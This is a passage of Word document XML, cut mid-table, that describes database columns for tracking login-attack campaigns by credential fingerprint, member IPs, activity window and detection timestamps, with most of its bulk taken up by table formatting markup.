        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CMP- followed by 8 hex characters of the fingerprint.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SHA-1 of the credential pairs shared by all member IPs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">first_seen, last_seen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity window of the campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ips, credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT[]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Member addresses and the shared user:password pairs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Human-readable summary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGSERIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequential identifier of the detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT NOW(), INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Time of detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
